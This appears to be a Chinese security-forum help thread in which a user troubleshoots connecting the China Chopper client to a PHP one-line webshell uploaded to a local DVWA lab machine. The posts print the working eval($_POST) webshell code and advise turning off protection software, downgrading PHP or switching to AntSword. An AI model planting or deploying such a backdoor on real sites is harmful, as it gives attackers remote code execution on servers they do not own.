首页
论坛
专栏
课程

[求助] 使用菜刀,但不能获取到网站文件

2017-8-8 10:08 4604

[求助] 使用菜刀,但不能获取到网站文件

2017-8-8 10:08
4604
上一主题 下一主题
最新回复 (18)
colddog 2017-8-8 10:25
2
0
utf8  试下
自由的翅膀 2017-8-8 12:00
3
0
colddog utf8 试下
试过了,一样,最多乱码的内容有点不同
afy 2017-8-8 14:08
4
0
到靶机上检查马的路径;检查马的单引号、分号等是否为英文;自己先在靶机上写个马,再用菜刀连接,以检查是否有其他未知因素。。。
自由的翅膀 2017-8-8 14:39
5
0
从另一个地方下的菜刀,这个就查看目录的时候总是500,internal  server  error.....我开始觉得是不是菜刀的问题了......有朋友提供一个确定没问题的菜刀吗..........
自由的翅膀 2017-8-8 14:40
6
0
afy 到靶机上检查马的路径;检查马的单引号、分号等是否为英文;自己先在靶机上写个马,再用菜刀连接,以检查是否有其他未知因素。。。
试过了,应该没有你说的问题
afy 2017-8-8 16:11
7
0
自由的翅膀 试过了,应该没有你说的问题
应该???我不明白你的意思。我现在想知道,你自己先在靶机上写个马,用菜刀能不能连接上???
自由的翅膀 2017-8-8 17:07
8
0
afy 应该???我不明白你的意思。我现在想知道,你自己先在靶机上写个马,用菜刀能不能连接上???
连不上
自由的翅膀 2017-8-8 17:08
9
0
自由的翅膀 连不上
直接在网站目录下添加一个一句话木马,然后用菜刀连这个文件都连不上
lixinwk 1 2017-8-9 09:38
10
0
检查对方是否开启网站安全防御,CDN什么的
afy 2017-8-9 09:53
11
0
自由的翅膀 直接在网站目录下添加一个一句话木马,然后用菜刀连这个文件都连不上
如果靶机上有安全狗之类的防护软件,先彻底关闭;换菜刀;我还真怀疑你知不知道网站根目录在哪,写个phpinfo看看。
自由的翅膀 2017-8-9 10:52
12
0




afy

如果靶机上有安全狗之类的防护软件,先彻底关闭;换菜刀;我还真怀疑你知不知道网站根目录在哪,写个phpinfo看看。

没安全狗,没任何防护软件。自己手动post一个包到上传的包含一句话木马的php页面,能正常访问。昨天菜刀连上去,响应报文content  length为0,今天把小马由

<?php  @eval($_POST['chopper']);?>

改为了这样

<?php  eval($_POST['chopper']);?>

,菜刀中就显示了报错信息,以下是菜刀中显示的响应报文

HTTP/1.1 200 OK
Date: Wed, 09 Aug 2017 02:51:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/7.1.6
X-Powered-By: PHP/7.1.6
Content-Length: 185
Content-Type: text/html; charset=UTF-8


<br />
<b>Warning</b>:  Cannot call assert() with string argument dynamically in <b>C:\xampp\htdocs\DVWA-master\hackable\uploads\test1.php(1) : eval()'d code</b> on line <b>1</b><br />



我觉得是菜刀的问题了

自由的翅膀 2017-8-9 11:00
13
0
afy 如果靶机上有安全狗之类的防护软件,先彻底关闭;换菜刀;我还真怀疑你知不知道网站根目录在哪,写个phpinfo看看。
phpinfo内容太多,不知该截哪部分的图
自由的翅膀 2017-8-9 11:02
14
0
lixinwk 检查对方是否开启网站安全防御,CDN什么的
什么防护都没,靶机只是我vmware里的一台虚拟机,我连windows防火墙也关了
afy 2017-8-9 11:05
15
0
自由的翅膀 phpinfo内容太多,不知该截哪部分的图
那就没问题啊,换一句话木马,换菜刀。。。
afy 2017-8-9 11:13
16
0

啊,知道了,你的php版本是7,版本比较高,你看看这个 http://php.net/manual/zh/migration71.incompatible.php,把php版本切换到5试试。


自由的翅膀 2017-8-9 11:18
17
0
afy 啊,知道了,你的php版本是7,版本比较高,你看看这个 http://php.net/manual/zh/migration71.incompatible. ...
所以我应该把php版本降低?
afy 2017-8-9 11:52
18
0
自由的翅膀 所以我应该把php版本降低?
搞定没啊,大佬。。。
wooyunking 2017-8-10 16:55
19
0
一群水货,别人本地搭建的DVWA还说什么CDN狗和杀软的问题,也是服了,这个你换成蚁剑连接
游客
登录 | 注册 方可回帖
返回